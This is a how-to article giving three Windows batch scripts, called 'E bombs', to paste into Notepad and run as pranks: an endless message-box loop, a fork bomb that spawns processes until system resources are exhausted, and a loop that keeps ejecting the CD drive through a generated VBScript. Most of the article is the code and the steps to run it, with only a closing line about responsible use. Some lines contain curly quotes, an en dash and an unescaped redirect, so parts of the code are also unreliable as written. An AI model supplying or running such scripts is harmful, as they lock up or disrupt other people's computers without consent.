3 Ways to Make an Easy E Bomb Using Notepad

Introduction:
Electronic, or “E” bombs, are malicious pieces of code that can be created using simple text editors like Notepad. While these are typically non-destructive and used for practical jokes or pranks, it is essential to understand the possible outcomes when creating and deploying such software. In this article, we will explore three easy methods for creating E Bombs using Notepad.
1. Endless Message Loop
This type of E Bomb continually displays a message box when executed.
Steps to create an Endless Message Loop:
a. Open Notepad.
b. Paste the following code into Notepad:
@ECHO off
:begin
MSG * Attention! This is an E Bomb!
GOTO begin
c. Save the file with a .bat extension (e.g., EBomb_MessageLoop.bat).
d. Double-click on the file to execute it, and a message box will be displayed infinitely.
2. Fork Bomb
A fork bomb is designed to consume system resources quickly by spawning multiple processes repeatedly.
Steps to create a Fork Bomb:
a. Open Notepad.
b. Paste the following code into Notepad:
:ForkBomb
START “”
GOTO ForkBomb
c. Save the file with a .bat extension (e.g., EBomb_ForkBomb.bat).
d. Double-click on the file to execute it, and multiple processes will be spawned continuously until system resources are depleted.
3. Endless Open/Closing CD Drive
This E Bomb repeatedly opens and closes the CD drive when executed.
Steps to create an Endless Open/Closing CD Drive:
a. Open Notepad.
b. Paste the following code into Notepad:
@ECHO off
:begin
ECHO Set oWMP=CreateObject(“WMPlayer.OCX.7”) > OpenClose.vbs
ECHO Set colCDROMs=oWMP.cdromCollection >> OpenClose.vbs
ECHO oWMP.close >> OpenClose.vbs
ECHO oWMP.open >> OpenClose.vbs
ECHO If colCDROMs.Count>= 1 Then >> OpenClose.vbs
ECHO For i=0 To colCDROMs.Count – 1 >> OpenClose.vbs
ECHO colCDROMs.Item(i).Eject >> OpenClose.vbs
ECHO Next >> OpenClose.vbs
ECHO End If >> OpenClose.vbs
START “” “OpenClose.vbs”
GOTO begin
c. Save the file with a .bat extension (e.g., EBomb_CD_Open_Close.bat).
d. Double-click on the file to execute it, and the CD drive will continuously open and close.
Conclusion:
Creating E Bombs using Notepad is a straightforward process, but it is essential to use them responsibly. Be aware of the implications that these simple codes can have on a system, and never use them maliciously or without the permission of the affected user. Always practice responsible coding and ensure that you are ethical with your actions.